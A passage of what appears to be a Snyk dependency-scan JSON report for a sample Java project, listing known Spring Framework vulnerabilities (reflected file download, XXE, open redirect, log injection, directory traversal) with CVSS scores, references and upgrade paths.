"functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/18124", + "title": "GitHub Issue" + }, + { + "url": 
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/", + "title": "Oren Hafif Blog" + }, + { + "url": "http://pivotal.io/security/cve-2015-5211", + "title": "Pivotal Security" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2015-5211", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9.6, + "modificationTime": "2024-03-11T09:48:48.763614Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:03.857756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.763614Z" + } + ], + "description": "## Overview\n\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\n\nAffected versions of this package are vulnerable to Reflected File Download\nvia a crafted URL with a batch script extension, resulting in the response being downloaded rather than rendered.\n\n## Remediation\n\nUpgrade `org.springframework:spring-web` to version 3.2.15.RELEASE, 4.1.8.RELEASE, 4.2.2.RELEASE or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543)\n\n- [GitHub 
Commit](https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402)\n\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/18124)\n\n- [Oren Hafif Blog](https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/)\n\n- [Pivotal Security](http://pivotal.io/security/cve-2015-5211)\n\n- [RedHat CVE Database](https://access.redhat.com/security/cve/cve-2015-5211)\n", + "epssDetails": { + "percentile": "0.68512", + "probability": "0.00278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5211" + ], + "CWE": [ + "CWE-494" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-10-15T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:48.763614Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.15.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", + "title": "Cross-site Request Forgery (CSRF)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "credit": [ + "Spase Markovski" + ], + "semver": { + "vulnerable": [ + 
"[3.0.0.RELEASE,3.2.8.RELEASE)", + "[4.0.0.RELEASE,4.0.2.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.8.RELEASE", + "4.0.2.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/edba32b3093703d5e9ed42b5b8ec23ecc1998398%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/fb0683c066e74e9667d6cd8c5fa01f674c68c3be%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", + "title": "GitHub Commit" + }, + { + "url": "https://jira.spring.io/browse/SPR-11376", + "title": "Jira Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054", + "title": "NVD" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-0054", + "title": "Pivotal Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 6.3, + "modificationTime": "2024-03-11T09:45:48.737689Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:09.210753Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:48.737689Z" + } + ], + "description": "## Overview\r\n[`org.springframework:spring-web`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-web%22)\r\nAffected versions of this package do not disable external entity 
resolution, which allows remote attackers to read arbitrary files, cause a denial of service and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue. \r\n\r\n**NOTE:** this vulnerability exists because of an incomplete fix for [CVE-2013-4152](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31330), [CVE-2013-7315](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30162), and [CVE-2013-6429](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30160).\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054)", + "epssDetails": { + "percentile": "0.96745", + "probability": "0.25530", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-0054" + ], + "CWE": [ + "CWE-352" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.538000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-04-17T14:55:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2014-06-06T21:43:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:45:48.737689Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.8.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + 
"credit": [ + "Sean Pesce" + ], + "semver": { + "vulnerable": [ + "[,5.3.32)", + "[6.0.0,6.0.17)", + "[6.1.0,6.1.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.32", + "6.0.17", + "6.1.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2024-22243", + "title": "Spring Advisory" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-02T15:25:03.264548Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. 
If it contains hierarchical components such as path, query, and fragment it may evade validation.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22243" + ], + "CWE": [ + "CWE-601", + "CWE-918" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-02-22T09:39:25.202849Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-02-21T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-02-22T15:48:30.525565Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-02T15:25:03.264548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "credit": [ + "threedr3am" + ], + "semver": { + "vulnerable": [ + "[,5.3.33)", + "[6.0.0, 6.0.18)", + "[6.1.0, 6.1.5)" + ] + }, + "exploit": "Not Defined", + 
"fixedIn": [ + "5.3.33", + "6.0.18", + "6.1.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2024-22259", + "title": "Spring Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-17T13:32:42.716493Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-02T15:25:03.250566Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-17T13:32:42.716493Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. 
\r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n", + "epssDetails": { + "percentile": "0.26310", + "probability": "0.00061", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22259" + ], + "CWE": [ + "CWE-601" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-03-15T10:11:04.950943Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-03-14T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-03-15T10:42:12.997061Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-02T15:25:03.250566Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "credit": [ + "L0ne1y" + ], + "semver": { + "vulnerable": [ + "[,5.3.34)", + "[6.0.0, 6.0.19)", + "[6.1.0, 6.1.6)" + ] + 
}, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.34", + "6.0.19", + "6.1.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://spring.io/security/cve-2024-22262", + "title": "Spring Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-04-16T13:32:25.163950Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.4, + "cvssVersion": "3.1", + "modificationTime": "2024-04-12T08:32:41.960388Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-04-16T13:32:25.163950Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. 
\n\n**Note:**\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n## References\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22262" + ], + "CWE": [ + "CWE-601" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-04-12T08:32:41.735891Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-04-11T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-04-12T08:32:41.913608Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-04-16T13:32:25.163950Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not 
Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to 
Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.18.RELEASE", + "org.springframework:spring-core@5.2.18.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" 
+ ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user 
provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.19.RELEASE", + "org.springframework:spring-core@5.2.19.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ 
+ "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": 
